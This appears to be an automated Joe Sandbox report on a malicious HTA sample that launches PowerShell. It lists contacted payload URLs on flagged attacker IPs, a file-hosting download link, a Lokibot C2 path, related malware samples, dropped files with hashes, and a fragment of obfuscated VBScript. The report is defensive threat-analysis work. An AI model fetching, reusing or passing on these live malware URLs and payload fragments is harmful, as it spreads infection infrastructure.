http://crl.microsoft	powershell.exe, 00000003.00000002.2088278913.0000000007FB0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.243.136/32/seemybes	powershell.exe, 00000001.00000002.2192931283.00000000053A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000001.00000002.2192931283.00000000053A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microG	powershell.exe, 00000009.00000002.2379784762.0000000006C83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ibsensoftware.com/	aspnet_compiler.exe, aspnet_compiler.exe, 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFility	powershell.exe, 00000001.00000002.2204284614.000000000744D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT	powershell.exe, 00000009.00000002.2324609506.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://1017.filemail.com	powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.243.136/cate	powershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6LR	powershell.exe, 00000007.00000002.2713596116.0000000004F36000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.micros	powershell.exe, 00000003.00000002.2077991615.0000000004F56000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFon	powershell.exe, 00000001.00000002.2204284614.000000000744D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	powershell.exe, 00000001.00000002.2192280720.0000000003109000.00000004.00000020.00020000.00000000.sdmp	false		high
https://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnt	powershell.exe, 00000009.00000002.2380660733.0000000006D11000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2192931283.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2077991615.0000000004821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2713596116.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.0000000004641000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.243.136/32/seemybestthingswithentirelifetimU&	powershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2201742184.0000000005B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082785336.000000000588A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2192931283.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2077991615.0000000004821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2713596116.0000000004F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.0000000004641000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.215.209.78	ip.1017.filemail.com	Canada	32156	HUMBER-COLLEGECA	false
192.3.243.136	unknown	United States	36352	AS-COLOCROSSINGUS	true
94.156.177.95	unknown	Bulgaria	43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1556631
Start date and time:	2024-11-15 18:13:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winHTA@20/23@1/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 76 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 1264 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 3160 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5732 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5948 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: kissmegoodthingwhichgivemebestthignswithgirluaremy.hta

Simulations

Behavior and APIs

Time	Type	Description
12:14:02	API Interceptor	124x Sleep call for process: powershell.exe modified
12:14:33	API Interceptor	77x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
142.215.209.78	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse
	INQ02010391.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Order_Confirmation.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse
	Po docs.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse
	seemebestthingswhichevermadebybestthingsgodown.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse
	transferencia interbancaria_867897870877.xlam.xlsx	Get hash	malicious	AgentTesla	Browse
192.3.243.136	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136/32/SMPLLS.txt
192.3.243.136	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136/33/LOGLK.txt
94.156.177.95	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95/simple/five/fre.php
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95/simple/five/fre.php
	Scan docs.exe	Get hash	malicious	Lokibot	Browse	94.156.177.95/simple/five/fre.php
	Po docs.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95/simple/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip.1017.filemail.com	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse	142.215.209.78
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	142.215.209.78
	INQ02010391.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.215.209.78
	Order_Confirmation.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	142.215.209.78
	Po docs.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse	142.215.209.78
	seemebestthingswhichevermadebybestthingsgodown.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	142.215.209.78
	transferencia interbancaria_867897870877.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	142.215.209.78

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HUMBER-COLLEGECA	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse	142.215.209.78
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	142.215.209.78
	INQ02010391.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.215.209.78
	Order_Confirmation.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	142.215.209.78
	Po docs.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse	142.215.209.78
	seemebestthingswhichevermadebybestthingsgodown.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	142.215.209.78
	transferencia interbancaria_867897870877.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	142.215.209.78
AS-COLOCROSSINGUS	Signert kontrakt og faktura.xls	Get hash	malicious	Unknown	Browse	107.173.4.61
	New order.xls	Get hash	malicious	Unknown	Browse	192.3.220.29
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136
	Signert kontrakt og faktura.xls	Get hash	malicious	Unknown	Browse	107.173.4.61
	New order.xls	Get hash	malicious	Unknown	Browse	192.3.220.29
	Signert kontrakt og faktura.xls	Get hash	malicious	Unknown	Browse	107.173.4.61
	New order.xls	Get hash	malicious	Unknown	Browse	192.3.220.29
	purchase order (2).xls	Get hash	malicious	Unknown	Browse	198.46.178.167
	purchase order (2).xls	Get hash	malicious	Unknown	Browse	198.46.178.167
NET1-ASBG	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95
	Scan docs.exe	Get hash	malicious	Lokibot	Browse	94.156.177.95
	Po docs.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.95
	FDA50N50 ONESMI _10000.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220
	sh.elf	Get hash	malicious	Gafgyt, Mirai	Browse	93.123.85.201
	ntpd.elf	Get hash	malicious	Gafgyt, Mirai	Browse	93.123.85.201
	ftp.elf	Get hash	malicious	Gafgyt, Mirai	Browse	93.123.85.201
	na.elf	Get hash	malicious	Gafgyt, Mirai	Browse	93.123.85.201
	sshd.elf	Get hash	malicious	Gafgyt, Mirai	Browse	93.123.85.201

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	142.215.209.78
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	142.215.209.78
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.215.209.78
	http://portableapps.com	Get hash	malicious	Unknown	Browse	142.215.209.78
	Order88983273293729387293828PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.215.209.78
	file.exe	Get hash	malicious	LummaC	Browse	142.215.209.78
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	142.215.209.78
	grd.ps1	Get hash	malicious	LummaC Stealer	Browse	142.215.209.78
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse	142.215.209.78
	Email_sending_restriction_[sebastien.morel!](#HOHSM).html	Get hash	malicious	Unknown	Browse	142.215.209.78

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\188E93\31437F.exe	invoice727282_PDF..exe	Get hash	malicious	AgentTesla	Browse
	#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse
	6038732).vbs	Get hash	malicious	Lokibot	Browse
	cirby0J3LP.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, XWorm, zgRAT	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	3vj5tYFb6a.exe	Get hash	malicious	Snake Keylogger, zgRAT	Browse
	50000PCSPIC12F1501-ESN.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exe	Get hash	malicious	XWorm	Browse
	Jdxvyx.exe	Get hash	malicious	AgentTesla	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seemybestthingswithentirelifetimethingstodomybest[1].tiff

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (371), with CRLF line terminators
Category:	dropped
Size (bytes):	141862
Entropy (8bit):	3.673972784160963
Encrypted:	false
SSDEEP:	1536:HimrsnAhOid+1d3duv8/DcFjk+2Vc3GyboSgt5pzIGwm:8AhOi01F8v8/wjk+2OGybxgt5pkGwm
MD5:	100D059D24305DC95DB276AA180DC4CF
SHA1:	CB2E9D345F365A0DC65B61CF40865B223C4688AD
SHA-256:	87BE9D53A554146BCBAB91270C1EF35561F5168E6F84EA86C26D23B4C803247D
SHA-512:	14F70627CBB1ADBB26D511D92558C471CA5354A1D0FA54A33D22D7C4933B6E1873871750F53318CD9C8D4E8B3F7627BAC2F4BAC3F295A67E2D35756AD951C8F5
Malicious:	false
Preview:	..........F.u.n.c.t.i.o.n. .d.e.s.e.m.p.e.n.o.(.B.y.V.a.l. .c.a.r.r.a.m.e.l.o.,. .B.y.V.a.l. .s.o.m.b.r.o.s.o.,. .B.y.V.a.l. .p.o.r.q.u.e.t.e.s.)..... . . . .D.i.m. .a.f.a.m.a.r..... . . . .a.f.a.m.a.r. .=. .I.n.S.t.r.(.c.a.r.r.a.m.e.l.o.,. .s.o.m.b.r.o.s.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .a.f.a.m.a.r. .>. .0..... . . . . . . . .c.a.r.r.a.m.e.l.o. .=. .L.e.f.t.(.c.a.r.r.a.m.e.l.o.,. .a.f.a.m.a.r. .-. .1.). .&. .p.o.r.q.u.e.t.e.s. .&. .M.i.d.(.c.a.r.r.a.m.e.l.o.,. .a.f.a.m.a.r. .+. .L.e.n.(.s.o.m.b.r.o.s.o.).)..... . . . . . . . .a.f.a.m.a.r. .=. .I.n.S.t.r.(.a.f.a.m.a.r. .+. .L.e.n.(.p.o.r.q.u.e.t.e.s.).,. .c.a.r.r.a.m.e.l.o.,. .s.o.m.b.r.o.s.o.)..... . . . .L.o.o.p..... . . . ..... . . . .d.e.s.e.m.p.e.n.o. .=. .c.a.r.r.a.m.e.l.o.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... . . . . . . . .R.e.a.d.S.t.d.I.n. .=. .R.e.a.d.S.t.d.I.n. .&. .s.t.d.I.n...R.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\RESCCA7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Fri Nov 15 18:26:51 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	3.9690761370281438
Encrypted:	false
SSDEEP:	24:HAim9pwusNHzwKTFexmfwI+ycuZhNnakSpPNnqSSd:wnCkKTAxmo1ulna3LqSC
MD5:	3648239C8DEBC2D685EBA8403E8BD092
SHA1:	43345804BA51778E3A695F3FA6CFB27BD8425BDC
SHA-256:	133CA9668CD785FE6ABC058EC026AC2BFBBDE28B25F4058468B4951650C8F7B7
SHA-512:	F135A211B142FB30E9ED2177A9F6FD042DB0AF7EB5E14B4E762244208C3DE254BE75838C135F9A429317D3DA200E10308D064E8CC573C52B007689DC27DC4E68
Malicious:	false
Preview:	L...k.7g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\glmzcldr\CSCA9586F3AA915453C854280BCC33938CA.TMP..................L....a..z.=.S.`..........5.......C:\Users\user\AppData\Local\Temp\RESCCA7.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.l.m.z.c.l.d.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wtml4eu.cwv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lp2wctz.onn.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aexnbf4c.qju.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdza12tg.ior.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbzo3nf3.4yy.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3c0vviw.r0e.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_roucxu1y.dzt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sedzurwf.cev.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tz3rac5n.yvd.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
